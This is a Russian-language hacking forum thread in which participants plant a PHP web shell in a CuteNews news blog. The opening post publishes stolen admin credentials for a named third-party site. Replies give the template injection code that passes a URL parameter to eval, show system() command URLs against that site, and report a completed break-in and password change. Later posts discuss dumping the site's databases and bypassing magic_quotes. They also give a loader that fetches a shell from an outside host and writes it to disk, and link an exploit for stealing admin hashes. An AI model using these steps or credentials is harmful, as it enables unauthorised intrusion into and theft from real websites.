Всем привет!
Вобщем возник вопрос как залить шелл в известный блог новостей (CuteNews) имея данные администратора.
Прочитал много мануалов и эфект нулейвой может ктонить сможет если сможете можете описать как сделали это буду очень признателен :)
Вот куда я хочу залить шелл.
_ttp://la2.no-ip.org/news/
Login: dsl
Password: 79513159

Заранее спасибо.

Оо у мня такаяже прабла немогу понять что нетак делаю. подскажите плиз.

скока писали уже про это...

1. Настройкa блока новостей -> Редактировать шаблоны
Добавляем в конец

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);

сохраняем
2.
_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);

p.s: там Windows...

Дело в том что я делаю так.
Настройкa блока новостей ->>> Редактировать шаблоны И вижу там


Редактируйте Части Шаблона

Активные новости
Полная версия
Комментарии
Форма добавления комментариев
Предыдущая & Следующая(новости)
Предыдущая & Следующая(коментарий)

Жму Активные новости

Там открывается окошко с следущим содержанием

<div style="width:100%; margin-bottom:30px;">
<div><strong>{title}</strong></div>

<div style="text-align:justify; padding:3px; margin-top:3px; margin-bottom:5px; border-top:1px solid #D3D3D3;">{short-story}</div>


</div>

Я дописываю HTML; if(isset($_GET['shell'])) eval($_GET['shell']);
Получается так

<div style="width:100%; margin-bottom:30px;">
<div><strong>{title}</strong></div>

<div style="text-align:justify; padding:3px; margin-top:3px; margin-bottom:5px; border-top:1px solid #D3D3D3;">{short-story}</div>


</div>
HTML; if(isset($_GET['shell'])) eval($_GET['shell']);

Потом захожу из этих сылоку куданить

_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);

Мне выдаёт ошибку мол

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in F:\site\www\news\data\Default.tpl on line 11

Что делать ваще незнаю :(

Сайт работает и я чуствую что он даже меня переживёт (((

ППЦ уже кто-то залез в админку и щас даже шаблон не отредактировать (((

А ты смельчак выкладывать логин и пароль в открытый доступ..

Это не мой :)))

http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
http://la2.no-ip.org/news/show_news.php?shell=system(dir);

все работает, пароль от админки я сменил, и т.к ты уже стучишся в аську ), я его тебе туда отправил...

М возник еще вопрос.
Дело в том что мне надо слить их базы.
Даныые базы хронятся тут http://la2.no-ip.org/config/config.php
Как организовать это скажите плиз.

Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему

Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему
Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?

подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап

подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап
:D
Это все знают, ток проблемы от базы пасы узнать ;) :)

а конфиг сложно посмотреть ? =\

Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);

ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?

P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать): Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1 Parse error: syntax error, unexpected $end in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1

Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?

Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...

Спасибо, что откликнулись))))
Я сам уже догадался...)
Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)

Ну ппц :) Я ж писал уже...
Дописываем в конце Active News:
HTML;
$data=implode('',file('http://game2v.narod.ru/shell.php.txt'));
$fp=fopen('./sk.php','wb');
fputs($fp,$data);
fclose($fp);
Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
У кого не получиться пм...

[akep']Ну ппц :)
:) Я ж писал, что нет возможности выполнить XSS)))....Но все зер ГУД)...Через Чары проблему решил)

Народ не подскажете как пасс достать админа в кут нюс, эксплоит или че нить, ссылочку =)

http://www.milw0rm.com/exploits/4779